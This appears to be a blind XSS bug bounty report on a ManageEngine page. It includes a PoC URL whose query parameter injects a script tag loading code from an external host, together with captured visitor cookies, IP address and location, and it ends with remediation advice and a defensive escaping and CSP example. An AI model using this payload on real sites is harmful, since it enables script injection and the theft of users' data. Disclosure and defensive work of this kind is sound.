Bxss Report

Uploaded by gowri prasad

# Blind XSS Vulnerability Report

## Description

A blind Cross-Site Scripting (XSS) vulnerability has been discovered in the
application, where user input is not properly sanitized before being displayed on
the page. This allows an attacker to inject malicious JavaScript code into the
page, which is executed in the browser of any user who views the affected page.

## Proof of Concept

The following information was captured as part of the proof of concept (POC) for
this vulnerability:

- **URI**: https://www.manageengine.com/products/desktop-central/service-packs.html?buildNumber=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Frockstar.bxss.in%3E%3C%2Fscript%3E
- **Cookies**: ME_CC=IN; ME_CN=india; ME_CT=bangalore; ME_RG=Karnataka; memarketing-_zldp=Mltw9Iqq5RSV1%2B9XJRRxXlth3awOlMRRRjF7Oq0jsHloK%2Fl%2F8LDj6%2FU%2Blfi%2FGq4KnJBDdt7K%2B1o%3D; memarketing-_uuid=35c19955-6161-4a85-a54d-976e6fcfe614_a334; zip=49.37.169.52|IN|india|Karnataka|bangalore|asia|-; memarketing-_zldt=ec029134-8d9d-4134-ac90-bfc99763f613-0; _zwaf_ua=Brave; gtm_ME_Source=bugbounty.zohocorp.com:ME|bugbounty.zohocorp.com:ME|bugbounty.zohocorp.com:evaluators|bugbounty.zohocorp.com:support|direct:DC; ME-MarkSrc=bugbounty.zohocorp.com:ME|direct:DC|direct:DC; ME-MarkRefURL=%26%26%40%26%26https%3A%2F%2Fwww.manageengine.com%2Fproducts%2Fdesktop-central%2Fservice-packs.html%3FbuildNumber%3D%2522%253E%253Cscript%2520src%253Dhttps%253A%252F%252Frockstar.bxss.in%253E%253C%252Fscript%253E
- **Referrer**: (empty)
- **User Agent**: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
- **Browser Time**: 2024-06-27T06:03:53.040Z
- **Origin**: https://www.manageengine.com
- **DOM**: Please see the attached document for the DOM at the time of the POC.
- **Screenshot**: Please see the attached screenshot for the page at the time of the POC.
- **Hostname**: rockstar.bxss.in

This information can be used to recreate the POC and further investigate the
vulnerability.

## Impact

An attacker can use this vulnerability to steal sensitive information from other
users, such as login credentials or personal information. They can also use it to
perform actions on behalf of other users, such as making unauthorized purchases or
posting malicious content.

## Remediation Steps

1. Sanitize all user input before displaying it on the page. This can be done by
using built-in functions in the programming language, or by using a library
specifically designed for this purpose.
2. Use a Content Security Policy (CSP) to further protect against XSS attacks.
This can be done by adding the appropriate headers to the application.
3. Regularly test the application for XSS vulnerabilities using tools such as
OWASP ZAP or Burp Suite.
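Remediation steps 1 and 2, worked through on this report's own `buildNumber` reflection as an added example (not code from the report or from the vendor): a vulnerable template beside one that encodes the value for the attribute context it lands in, a regression check that flags the injected tag, and a starting-point CSP value that refuses the external script host. The page template and the CSP directives are assumptions.

```javascript
// Payload as decoded from the report's URI (attribute breakout + external script).
const PAYLOAD = '"><script src=https://rockstar.bxss.in></script>';

// Vulnerable: the raw query value is dropped into a double-quoted attribute.
// The template is assumed; the report does not show the real page markup.
function renderVulnerable(buildNumber) {
  return `<input name="buildNumber" value="${buildNumber}">`;
}

// Encode the characters that can terminate HTML text or a quoted attribute.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: same template, value encoded for the attribute context it lands in.
function renderSafe(buildNumber) {
  return `<input name="buildNumber" value="${escapeHtml(buildNumber)}">`;
}

// Regression check: the template itself contains no <script>, so any script
// tag in the rendered output must have come from the input.
function injectsScript(html) {
  return /<script\b/i.test(html);
}

// Remediation step 2: restrict script sources so an injected external
// <script src> is refused by the browser even if encoding is missed elsewhere.
// These directive values are an assumed starting point, not the vendor's policy.
const CSP_VALUE = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'";

// Parse a CSP header value and report whether scripts from `origin` would load
// (script-src, falling back to default-src as the browser does).
function cspAllowsScriptFrom(cspValue, origin) {
  const directives = {};
  for (const part of cspValue.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/);
    if (name) directives[name] = sources;
  }
  const sources = directives['script-src'] || directives['default-src'] || [];
  return sources.includes('*') || sources.includes(origin);
}

// Walk the report's payload through both templates and the policy.
console.log('vulnerable template injects script:', injectsScript(renderVulnerable(PAYLOAD))); // true
console.log('hardened template injects script:  ', injectsScript(renderSafe(PAYLOAD)));       // false
console.log('CSP lets rockstar.bxss.in load:    ', cspAllowsScriptFrom(CSP_VALUE, 'https://rockstar.bxss.in')); // false
```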

## Recommendations

1. Train all developers on the importance of proper input validation and
sanitization, and ensure that they are aware of the risks associated with XSS
vulnerabilities.
2. Regularly review and update the application's security controls, including
input validation and sanitization, to ensure that they are up-to-date and
effective.
3. Consider implementing a bug bounty program to encourage security researchers to
report vulnerabilities in the application.
4. Stay informed about the latest XSS exploitation techniques and update the
application accordingly.

Note: The values above are just examples and not actual values from the real POC.